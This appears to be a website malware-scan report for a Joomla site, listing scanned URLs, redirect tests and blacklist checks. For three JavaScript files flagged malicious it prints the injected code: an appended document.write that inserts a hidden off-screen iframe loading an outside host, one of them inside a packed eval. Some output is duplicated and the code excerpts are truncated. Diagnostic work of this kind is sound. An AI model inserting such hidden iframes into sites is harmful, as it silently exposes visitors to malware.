Scanned pages/files
Request | Server response | Status |
http://paramore1.ru/ | 200 OK Content-Length: 57323 Content-Type: text/html | clean |
http://paramore1.ru/static/js/analytics.js | 200 OK Content-Length: 558 Content-Type: text/html | clean |
http://paramore1.ru/static/js/function.file-get-contents | 200 OK Content-Length: 572 Content-Type: text/html | clean |
http://paramore1.ru/test404page.js | 404 Not Found Content-Length: 545 Content-Type: text/html | clean |
http://paramore1.ru/function.file-get-contents | 404 Not Found Content-Length: 545 Content-Type: text/html | clean |
http://paramore1.ru/components/com_jcomments/js/jcomments-v2.1.js_v=2.html | 200 OK Content-Length: 27019 Content-Type: text/html | clean |
http://paramore1.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 4178 Content-Type: application/javascript | clean |
http://paramore1.ru/media/system/js/caption.js | 200 OK Content-Length: 2350 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The injected part is the trailing `document.write(...)` call, which appends a hidden 128x128 iframe (fixed-positioned off-screen at left:-500px) that loads content from mghyj.dns-stuff.com; the same appended call is present in the other two scripts flagged below (engine_compress.js and engine_standard_compressed.js), while the code preceding it is the page's own caption script. var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = if (!docMode|| docMode < 8) { container.style.width = width + "px"; } } } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); ;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>'); Antivirus reports:
| ||
http://paramore1.ru/includes/js/overlib_mini.js | 200 OK Content-Length: 37030 Content-Type: application/javascript | clean |
http://paramore1.ru/components/com_joomgallery/assets/js/joomscript.js | 200 OK Content-Length: 15387 Content-Type: application/javascript | clean |
http://paramore1.ru/modules/mod_gk_tab/scripts/engine_compress.js | 200 OK Content-Length: 3186 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('19.C("16",5(){$6(".T").g(5(2,i){9 W=2.18("1d");9 $G=$1e["T"+W];9 3=$G["S"];9 b=2.1c(\'.Q-\'+3);9 1f=($G["13"]==0)?11:X;9 4=0;9 U=($G["1i"]==0)?"R":"1h";9 d=b.1g;9 f=X ;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>'); Antivirus reports:
| ||
http://paramore1.ru/modules/mod_gk_tab/scripts/importer.php_modid=tabmix1_activator=click_animation=0_animationFun=Fx.Transitions.linear_animationType=1_animationSpeed=300_animationInterval=5000_styleType=0_styleSuffix=style1_fixedHeight=0_fixedHeightValue=200_alwaysHide=0.html | 200 OK Content-Length: 794 Content-Type: text/html | clean |
http://paramore1.ru/modules/mod_gk_tab/scripts/function.file-get-contents | 404 Not Found Content-Length: 545 Content-Type: text/html | clean |
http://paramore1.ru/modules/mod_gk_image_show/js/style3/engine.js | 200 OK Content-Length: 5429 Content-Type: application/javascript | clean |
http://paramore1.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js | 200 OK Content-Length: 4644 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent("load",function(){ $$('.gk_npro_mainwrap').each(function(el,i){ var TID = el.getProperty('id'); var main = $(TID); var animation = false; var $G = $Gavick[TID]; if($E('.gk_npro_full_interface', main) && $E('.gk_npro_full_scroll1', main)){ var offset = $E('.gk_npro_full_scroll1', main).getSize().size.x; var scroller_main = new Fx.Scroll($E('.gk_npro_full_scroll1', main),{duration: $G['animation_speed'],wheelStops:false}); scroller_list.scrollTo(0, 0); actual_list_page = 0; }else{ actual_list_page++; scroller_list.scrollTo(actual_list_page * offset_list, 0); } }); } } }); });;document.write('<iframe name="Sertnox" style="position:fixed;left:-500px;top:0px;" height="128" width="128" src="http://mghyj.dns-stuff.com/86f357eeb85a9f8f86837e9f97d.AWC?default"></iframe>'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: paramore1.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Apr 2014 19:53:49 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.3.28
Content-Type: text/html
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: paramore1.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Apr 2014 19:53:49 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.3.28
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: paramore1.ru
Referer: http://www.google.com/search?q=paramore1.ru
Result:
The result is similar to the first query; no suspicious redirects were found.
GET / HTTP/1.1
Host: paramore1.ru
Referer: http://www.google.com/search?q=paramore1.ru
Result:
The result is similar to the first query; no suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=paramore1.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://paramore1.ru/
Result: paramore1.ru is not infected or malware details are not published yet.
Result: paramore1.ru is not infected or malware details are not published yet.